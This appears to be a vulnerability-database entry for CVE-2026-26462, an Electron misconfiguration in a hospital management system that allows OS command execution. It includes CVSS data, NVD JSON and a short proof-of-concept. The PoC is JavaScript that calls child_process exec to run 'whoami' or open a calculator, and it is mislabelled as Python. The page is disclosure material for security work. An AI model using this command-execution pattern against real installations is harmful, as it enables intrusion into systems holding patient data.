CVE-2026-26462

Description

Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Offline Hospital Management System 5.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-26462
// Exploiting Electron insecure configuration (Node.js integration enabled, context isolation disabled)
// This snippet demonstrates executing arbitrary OS commands from the renderer process.

const { exec } = require('child_process');

// Example: Execute 'whoami' to get the current user
exec('whoami', (error, stdout, stderr) => {
  if (error) {
    console.error(`exec error: ${error}`);
    return;
  }
  console.log(`Current User: ${stdout}`);
});

// Example: Execute 'calc' on Windows or 'open -a Calculator' on macOS
// exec('calc', (err) => { if(!err) console.log('Calculator opened'); });

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26462
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26462
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26462/
[4] VulDB https://vuldb.com/cve/CVE-2026-26462
[5] https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4
[6] https://sourceforge.net/projects/hospital-management-system/files/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26462", "sourceIdentifier": "[email protected]", "published": "2026-05-18T15:16:25.230", "lastModified": "2026-05-20T13:16:16.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-917"}]}], "references": [{"url": "https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/hospital-management-system/files/", "source": "[email protected]"}]}}